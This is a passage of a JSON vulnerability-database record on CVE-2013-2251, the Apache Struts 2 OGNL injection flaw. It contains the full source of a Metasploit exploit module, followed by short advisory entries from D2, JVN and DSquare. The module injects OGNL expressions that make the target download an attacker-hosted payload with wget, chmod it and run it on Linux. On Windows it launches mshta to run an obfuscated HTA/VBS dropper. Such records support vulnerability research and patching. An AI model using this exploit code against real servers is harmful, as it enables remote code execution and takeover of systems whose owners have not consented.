properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.", "modified": "2017-07-24T13:26:21", "published": "2013-07-24T13:52:02", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEFAULT_ACTION_MAPPER", "href": "", "type": "metasploit", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\n 'Description' => %q{\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\n a desired navigational target expression. This mechanism was intended to help with\n attaching navigational information to buttons within forms.\n\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\n \"redirectAction:\" is not properly sanitized. Since said information will be\n evaluated as OGNL expression against the value stack, this introduces the\n possibility to inject server side code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Takeshi Terada', # Vulnerability discovery\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit modules\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2251' ],\n [ 'OSVDB', '95405' ],\n [ 'BID', '61189' ],\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\n ],\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Windows',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n ['Linux',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ]\n ],\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DisclosureDate' => 'Jul 2 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\n OptInt.new('PAYLOAD_REQUEST_DELAY', [true, 'Time to wait for the payload request', 5]),\n # It isn't OptPath becuase it's a *remote* path\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\n ])\n end\n\n def on_new_session(session)\n if session.type == \"meterpreter\"\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\n end\n\n @dropped_files.delete_if do |file|\n false unless file =~ /\\.exe/\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\n if session.type == \"meterpreter\"\n begin\n wintemp = session.sys.config.getenv('TEMP')\n win_file = \"#{wintemp}\\\\#{win_file}\"\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\n session.fs.file.rm(win_file)\n print_good(\"Deleted #{file}\")\n true\n rescue ::Rex::Post::Meterpreter::RequestError\n print_error(\"Failed to delete #{win_file}\")\n false\n end\n end\n end\n\n super\n end\n\n def start_http_service\n # do not use SSL for this part\n # XXX: See https://github.com/rapid7/metasploit-framework/issues/3853\n # It must be possible to do this without directly editing the\n # datastore.\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\n start_service({\n 'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => '/'\n }\n })\n\n # Restore SSL preference\n # XXX: See https://github.com/rapid7/metasploit-framework/issues/3853\n # It must be possible to do this without directly editing the\n # datastore.\n datastore['SSL'] = true if ssl_restore\n\n return service_url\n end\n\n def check\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n\n if res.nil? or res.code != 200\n vprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\n return Exploit::CheckCode::Unknown\n end\n\n proof = rand_text_alpha(6 + rand(4))\n\n res = send_request_cgi({\n 'uri' => \"#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}\",\n 'method' => 'GET'\n })\n\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def auto_target\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n\n if res.nil? or res.code != 200\n fail_with(Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\n end\n\n proof = rand_text_alpha(6 + rand(4))\n\n res = send_request_cgi({\n 'uri' => \"#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\n 'method' => 'GET'\n })\n\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\n if res.headers['Location'] =~ /:\\\\/\n return targets[1] # Windows\n else\n return targets[2] # Linux\n end\n end\n\n fail_with(Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\n\n end\n\n def exploit_linux\n\n downfile = rand_text_alpha(8+rand(8))\n @pl = @exe\n @pl_sent = false\n\n #\n # start HTTP service if necessary\n #\n service_url = start_http_service\n\n #\n # download payload\n #\n fname = datastore['WritableDir']\n fname = \"#{fname}/\" unless fname =~ %r'/$'\n fname << downfile\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # wait for payload download\n #\n wait_payload\n\n register_file_for_cleanup(fname)\n\n #\n # chmod\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # execute\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n end\n\n def exploit_windows\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\n @pl = build_hta\n @pl_sent = false\n\n #\n # start HTTP service if necessary\n #\n service_url = start_http_service\n\n #\n # execute hta\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # wait for payload download\n #\n wait_payload\n\n register_file_for_cleanup(@var_exename)\n end\n\n def exploit\n if target.name =~ /Automatic/\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\n my_target = auto_target\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\n else\n my_target = target\n end\n\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\n\n if my_target.name =~ /Linux/\n if datastore['PAYLOAD'] =~ /windows/\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\n end\n exploit_linux\n elsif my_target.name =~ /Windows/\n if datastore['PAYLOAD'] =~ /linux/\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\n end\n exploit_windows\n end\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, request)\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @pl_sent = true\n send_response(cli, @pl)\n end\n\n def autofilter\n true\n end\n\n # wait for the data to be sent\n def wait_payload\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\n\n waited = 0\n while (not @pl_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\n end\n end\n\n sleep(datastore['PAYLOAD_REQUEST_DELAY'])\n end\n\n def build_hta\n var_shellobj\t\t= rand_text_alpha(rand(5)+5);\n var_fsobj\t\t = rand_text_alpha(rand(5)+5);\n var_fsobj_file\t\t= rand_text_alpha(rand(5)+5);\n var_vbsname\t\t = rand_text_alpha(rand(5)+5);\n var_writedir\t\t= rand_text_alpha(rand(5)+5);\n\n var_origLoc\t\t = rand_text_alpha(rand(5)+5);\n var_byteArray\t\t= rand_text_alpha(rand(5)+5);\n var_writestream\t\t= rand_text_alpha(rand(5)+5);\n var_strmConv\t\t= rand_text_alpha(rand(5)+5);\n\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\n # even when executing it as an \"HTA\" application\n # The encoding code has been stolen from ie_unsafe_scripting.rb\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\n\n # Build the content that will end up in the .vbs file\n vbs_content\t= Rex::Text.to_hex(%Q|\nDim #{var_origLoc}, s, #{var_byteArray}\n#{var_origLoc} = SetLocale(1033)\n|)\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\n # for conversion with ADODB.Stream\n vbs_ary = []\n # The output of this loop needs to be as small as possible since it\n # gets repeated for every byte of the executable, ballooning it by a\n # factor of about 80k (the current size of the exe template). In its\n # current form, it's down to about 4MB on the wire\n @exe.each_byte do |b|\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\n end\n vbs_content << vbs_ary.join(\"\")\n\n # Continue with the rest of the vbs file;\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\n # Then use ADODB.Stream again to write the binary to file.\n #print_status(\"Finishing vbs...\");\n vbs_content << Rex::Text.to_hex(%Q|\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\n\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\n\n#{var_strmConv}.Type = 2\n#{var_strmConv}.Charset = \"x-ansi\"\n#{var_strmConv}.Open\n#{var_strmConv}.WriteText s, 0\n#{var_strmConv}.Position = 0\n#{var_strmConv}.Type = 1\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\n\nSetLocale(#{var_origLoc})|)\n\n hta = <<-EOS\n <script>\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\n\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\n #{var_fsobj_file}.Close();\n\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\n window.close();\n </script>\n EOS\n\n return hta\n end\n\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_default_action_mapper.rb"}], "d2": [{"lastseen": "2016-09-25T14:10:43", "bulletinFamily": "exploit", "description": "**Name**| d2sec_struts4 \n---|--- \n**CVE**| CVE-2013-2251 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts4 \n**Notes**| \n", "modified": "2013-07-19T23:37:30", "published": "2013-07-19T23:37:30", "id": "D2SEC_STRUTS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts4", "title": "DSquare Exploit Pack: D2SEC_STRUTS4", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "jvn": [{"lastseen": "2018-08-31T00:36:20", "bulletinFamily": "info", "description": "\n ## Description\n\nApache Struts provided by the Apache Software Foundation is a software framework for creating Java web applications. Apache Struts contains a remote command execution vulnerability. \n \nThis issue is the same issue that the developer published as [S2-016](<http://struts.apache.org/release/2.3.x/docs/s2-016.html>) on July 16, 2013 \n \nNote that attacks leveraging this vulnerability have been confirmed. \n\n\n ## Impact\n\nAn arbitrary command may be executed on the server where Apache Struts resides.\n\n ## Solution\n\n**Apply an Update** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * Apache Struts 2.0.0 through 2.3.15 \n\n", "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "JVN:33504150", "href": "http://jvn.jp/en/jp/JVN33504150/index.html", "title": "JVN#33504150: Apache Struts vulnerable to remote command execution", "type": "jvn", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "Apache-Struts2 RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-10-20T00:00:00", "published": "2013-10-20T00:00:00", "id": "E-341", "href": "", "type": "dsquare", "title": "Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
